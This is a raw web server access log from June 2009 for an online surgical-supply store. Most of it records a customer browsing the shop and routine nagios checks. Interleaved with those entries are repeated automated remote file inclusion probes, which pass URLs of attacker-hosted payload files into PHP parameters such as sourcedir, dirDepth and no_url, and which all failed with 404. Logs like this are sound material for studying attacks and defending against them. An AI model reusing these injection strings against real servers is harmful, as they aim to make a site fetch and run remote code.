66.74.141.181 - - [06/Jun/2009:02:47:49 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3C4C225222009EBE06B+M37+ENG HTTP/1.1" 200 47557 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3C462172F200971E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:47:50 -0400] "GET /images/items/04948401_THUMB.JPG HTTP/1.1" 200 2092 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3C4C225222009EBE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:48:08 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3C4C2972F200D70E06B+M37+ENG HTTP/1.1" 200 47570 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3C4C225222009EBE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:48:09 -0400] "GET /images/fav_r-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3C4C2972F200D70E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:48:10 -0400] "GET /images/fav_r-b.gif HTTP/1.1" 200 266 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3C4C2972F200D70E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:48:11 -0400] "GET /images/fav_r-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3C4C2972F200D70E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:48:30 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3C4D27121200EDBE06B+M37+ENG HTTP/1.1" 200 47553 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3C4C2972F200D70E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:48:34 -0400] "GET /images/items/04948501_THUMB.JPG HTTP/1.1" 200 2235 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3C4D27121200EDBE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:48:41 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3D422CA212000F6E06B+M37+ENG HTTP/1.1" 200 47555 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3C4D27121200EDBE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:48:47 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3D4C2E02F20000AE06B+M37+ENG HTTP/1.1" 200 43474 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3D422CA212000F6E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
76.164.212.18 - - [06/Jun/2009:02:49:30 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.122.160.145 - - [06/Jun/2009:02:50:28 -0400] "GET /logs/error_log.Q108092400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
222.122.160.145 - - [06/Jun/2009:02:50:28 -0400] "GET /logs/error_log.Q109050800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
222.122.160.145 - - [06/Jun/2009:02:50:28 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
222.122.160.145 - - [06/Jun/2009:02:50:28 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
209.59.12.99 - - [06/Jun/2009:02:50:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.74.141.181 - - [06/Jun/2009:02:50:58 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3D422B92F200138E06B+M37+ENG HTTP/1.1" 200 77317 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3D4C2E02F20000AE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:51:00 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3D422B92F200138E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:51:00 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3D422B92F200138E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:51:00 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3D422B92F200138E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:51:17 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3D4F2142720087BE06B+M37+ENG HTTP/1.1" 200 47568 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3D422B92F200138E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:51:25 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3D4122423200A7FE06B+M37+ENG HTTP/1.1" 200 47570 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3D4F2142720087BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:52:25 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3D482DC2C200AEEE06B+M37+ENG HTTP/1.1" 200 51574 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3D4122423200A7FE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:52:27 -0400] "GET /images/items/7470915_THUMB.JPG HTTP/1.1" 200 2595 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3D482DC2C200AEEE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:52:27 -0400] "GET /images/items/7473003_THUMB.JPG HTTP/1.1" 200 2263 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3D482DC2C200AEEE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
90.185.249.111 - - [06/Jun/2009:02:53:10 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
90.185.249.111 - - [06/Jun/2009:02:53:25 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
66.74.141.181 - - [06/Jun/2009:02:53:27 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3D4321422200EC3E06B+M37+ENG HTTP/1.1" 200 47528 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3D482DC2C200AEEE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:53:29 -0400] "GET /images/items/7474003_THUMB.JPG HTTP/1.1" 200 2399 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3D4321422200EC3E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:53:56 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4E21E242001CAE06B+M37+ENG HTTP/1.1" 200 39079 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3D4321422200EC3E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:54:15 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3E492CA292003FFE06B+M37+ENG HTTP/1.1" 200 39080 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4E21E242001CAE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:54:58 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4B2A725200455E06B+M37+ENG HTTP/1.1" 200 47152 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E492CA292003FFE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
222.236.47.188 - - [06/Jun/2009:02:55:27 -0400] "GET /logs/error_log.Q109050800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 261 "-" "libwww-perl/5.65"
222.236.47.188 - - [06/Jun/2009:02:55:27 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
222.236.47.188 - - [06/Jun/2009:02:55:27 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 240 "-" "libwww-perl/5.65"
222.236.47.188 - - [06/Jun/2009:02:55:27 -0400] "GET /logs/error_log.Q108092400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 261 "-" "libwww-perl/5.65"
66.74.141.181 - - [06/Jun/2009:02:55:32 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:31 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG HTTP/1.1" 200 76268 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4B2A725200455E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:33 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:33 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:33 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:33 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:33 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:33 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:34 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:34 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:34 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:34 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:34 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:34 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:35 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:35 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:35 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:35 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:35 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:35 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:36 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:36 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
90.185.249.111 - - [06/Jun/2009:02:55:36 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.74.141.181 - - [06/Jun/2009:02:55:36 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:36 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:37 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:37 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:37 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:38 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:38 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:55:40 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3E4329B2320074BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
199.120.90.222 - - [06/Jun/2009:02:55:43 -0400] "GET /logs/access_log.Q109050900%20%20/wamp_dir/setup/yesno.phtml?no_url=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
199.120.90.222 - - [06/Jun/2009:02:55:43 -0400] "GET /wamp_dir/setup/yesno.phtml?no_url=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
199.120.90.222 - - [06/Jun/2009:02:55:43 -0400] "GET /logs/access_log.Q109050300%20%20/wamp_dir/setup/yesno.phtml?no_url=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
199.120.90.222 - - [06/Jun/2009:02:55:43 -0400] "GET /logs/wamp_dir/setup/yesno.phtml?no_url=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
90.185.249.111 - - [06/Jun/2009:02:55:45 -0400] "GET /logs/access_log.Q109052100%20%20/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:02:55:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
199.120.90.222 - - [06/Jun/2009:02:58:55 -0400] "GET /logs/access_log.Q109050300/wamp_dir/setup/yesno.phtml?no_url=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
199.120.90.222 - - [06/Jun/2009:02:58:55 -0400] "GET /logs/access_log.Q109050900/wamp_dir/setup/yesno.phtml?no_url=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:03:00:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [06/Jun/2009:03:05:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.203.95.235 - - [06/Jun/2009:03:09:43 -0400] "GET /logs/access_log.Q109051800//index.php?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
212.203.95.235 - - [06/Jun/2009:03:09:43 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
201.232.54.48 - - [06/Jun/2009:03:10:28 -0400] "GET /index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:03:10:28 -0400] "GET /logs/access_log.Q109052500%20%20/index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:03:10:28 -0400] "GET /logs/index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
90.185.249.111 - - [06/Jun/2009:03:10:44 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
